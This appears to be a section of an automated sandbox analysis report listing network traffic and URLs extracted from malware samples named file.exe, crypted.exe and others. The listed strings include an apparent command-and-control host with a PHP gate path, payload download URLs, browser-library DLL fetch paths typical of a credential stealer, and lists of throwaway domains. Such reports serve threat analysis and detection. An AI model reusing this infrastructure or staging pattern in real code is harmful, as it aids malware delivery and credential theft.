                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: crypted.exe, 00000013.00000002.2528818634.00000000031FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https: equals www.youtube.com (Youtube)
                    Source: crypted.exe, 00000013.00000003.2516651844.00000000031FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a964aafb6ec188b485ed; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=4149e28c0493da5a19db019d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25594Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 11 Nov 2024 15:37:21 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Controlt equals www.youtube.com (Youtube)
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C80f26d8df816a964aafb6ec188b485ed; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=bf1cfb4c487878fa3d131446; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25594Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 11 Nov 2024 15:37:44 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                    Source: crypted.exe, 00000013.00000002.2528818634.00000000031FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https: equals www.youtube.com (Youtube)
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: apis.google.com
                    Source: global trafficDNS traffic detected: DNS query: play.google.com
                    Source: global trafficDNS traffic detected: DNS query: terracedjz.cyou
                    Source: global trafficDNS traffic detected: DNS query: repostebhu.sbs
                    Source: global trafficDNS traffic detected: DNS query: thinkyyokej.sbs
                    Source: global trafficDNS traffic detected: DNS query: ducksringjk.sbs
                    Source: global trafficDNS traffic detected: DNS query: explainvees.sbs
                    Source: global trafficDNS traffic detected: DNS query: brownieyuz.sbs
                    Source: global trafficDNS traffic detected: DNS query: rottieud.sbs
                    Source: global trafficDNS traffic detected: DNS query: relalingj.sbs
                    Source: global trafficDNS traffic detected: DNS query: tamedgeesy.sbs
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: global trafficDNS traffic detected: DNS query: presticitpo.store
                    Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
                    Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
                    Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
                    Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
                    Source: global trafficDNS traffic detected: DNS query: founpiuer.store
                    Source: global trafficDNS traffic detected: DNS query: navygenerayk.store
                    Source: global trafficDNS traffic detected: DNS query: scriptyprefej.store
                    Source: global trafficDNS traffic detected: DNS query: marshal-zhukov.com
                    Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: c61fcc859d.exe, 0000001E.00000002.2748280155.0000000001391000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748428421.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744367054.00000000013A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exem
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001061000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781458116.0000000000CFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781937104.00000000010E1000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781937104.000000000104E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$$
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll-Dz
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlle
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllw
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllqD6
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllA
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllS
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll5L(
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/7
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/?
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/C:
                    Source: c61fcc859d.exe, 00000017.00000002.2787369302.0000000005760000.00000004.00000800.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/RRC:
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/T$
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 00000018.00000002.2626496741.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                    Source: file.exe, 00000000.00000002.1975345843.00000000234FF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php1
                    Source: c61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
                    Source: file.exe, 00000000.00000002.1975345843.00000000234FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8:
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
                    Source: file.exe, 00000000.00000002.1975345843.00000000234FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpA
                    Source: c61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpP
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpT
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpcal
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpion:
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpo
                    Source: file.exe, 00000000.00000002.1975345843.00000000234FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpodules;C:
                    Source: file.exe, 00000000.00000002.1975345843.00000000234FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr%
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phps
                    Source: c61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpt
                    Source: c61fcc859d.exe, 00000017.00000002.2787369302.0000000005771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpx
                    Source: 309de20225.exe, 0000001F.00000002.2848404906.0000000000F6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/s
                    Source: 309de20225.exe, 00000018.00000002.2626496741.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, 309de20225.exe, 0000001F.00000002.2848404906.0000000000F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                    Source: c61fcc859d.exe, 00000017.00000002.2781937104.0000000001087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.2069U
                    Source: file.exe, 00000000.00000002.1958673273.0000000000C05000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.206ones
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DD7A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EBF2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2501574678.00000144EC093000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.00000260901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260819E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2687459225.000002609007E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmp, freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: c61fcc859d.exe, 00000017.00000003.2597329510.00000000057AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: powershell.exe, 0000001A.00000002.2596038718.0000026081874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.00000260816C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000D.00000002.2454333796.00000144DBEC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2596038718.0000026080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: crypted.exe, 00000013.00000002.2528369086.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516436644.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516404629.000000000324A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000003.2516020141.000000000323F000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000013.00000002.2529146420.0000000003250000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2597838654.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2572394052.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2587650360.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2585443365.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2569730542.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2546576747.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2570490116.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 00000017.00000003.2556134423.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2745036681.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744443692.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000002.2748090958.000000000136C000.00000004.00000020.00020000.00000000.sdmp, c61fcc859d.exe, 0000001E.00000003.2744279869.00000000013D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
